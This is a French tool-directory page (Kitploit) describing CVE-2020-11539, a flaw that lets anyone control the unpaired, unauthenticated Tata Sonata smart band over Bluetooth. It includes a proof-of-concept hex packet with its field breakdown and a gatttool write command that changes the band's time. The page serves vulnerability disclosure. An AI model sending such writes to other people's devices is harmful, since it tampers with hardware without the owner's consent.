Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/the-girl-who-lived/cve-2020-11539
Sécurité BluetoothSécurité IoTAnalyse des VulnérabilitésExploitationSécurité Sans FilSécurité Matériel et IoT
GitHubthe-girl-who-lived/cve-2020-11539

CVE-2020-11539

Contrôle d'accès inadéquat dans le bracelet intelligent Tata Sonata

Voir le dépôt
1115il y a 6 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2020-11539: Contrôle d'accès inapproprié dans le bracelet intelligent Tata Sonata

Informations

Description: Il a été identifié que le bracelet intelligent n'a pas d'appairage (niveau de sécurité BLE mode 0). Les données transmises par voie hertzienne ne sont pas chiffrées. De plus, les données envoyées au bracelet intelligent n'ont aucune authentification ni vérification de signature, ce qui permet à un attaquant de contrôler les paramètres de l'appareil.

Versions concernées: Smart SF Rush - 1.12

Chercheur: Sayli Ambure (https://twitter.com/sayli_ambure)

Lien MITRE CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11539

Exploit de preuve de concept

Description

Le paquet suivant a été rétroconçu et s'avère être destiné à changer l'heure. D'autres paquets peuvent être rétroconçus en extrayant le dump hcisnoop de votre téléphone.

  1. Valeur des données: 00870e00141401060712052b051e

    Hexdump des données:00870e00141401060712052b051e
    Décimal des données:00135140020200106071805430530
  • 00 87: En-tête du paquet

  • 0e 00: Type du paquet

  • 14 14: Année en hexadécimal (2020)

  • 01 06: Mois et jour ( 6 janvier )

  • 07 12: Heure et minute en hexadécimal ( 07:18 )

  • 05 : Secondes

  1. Envoyer la commande Gatttool suivante pour contrôler l'heure du bracelet intelligent :

gatttool -t random -b <mac-address> --char-write-req -a 0xe -n 00870e00141401060712052b051e

Vidéo de preuve de concept :

Télécharger l’outil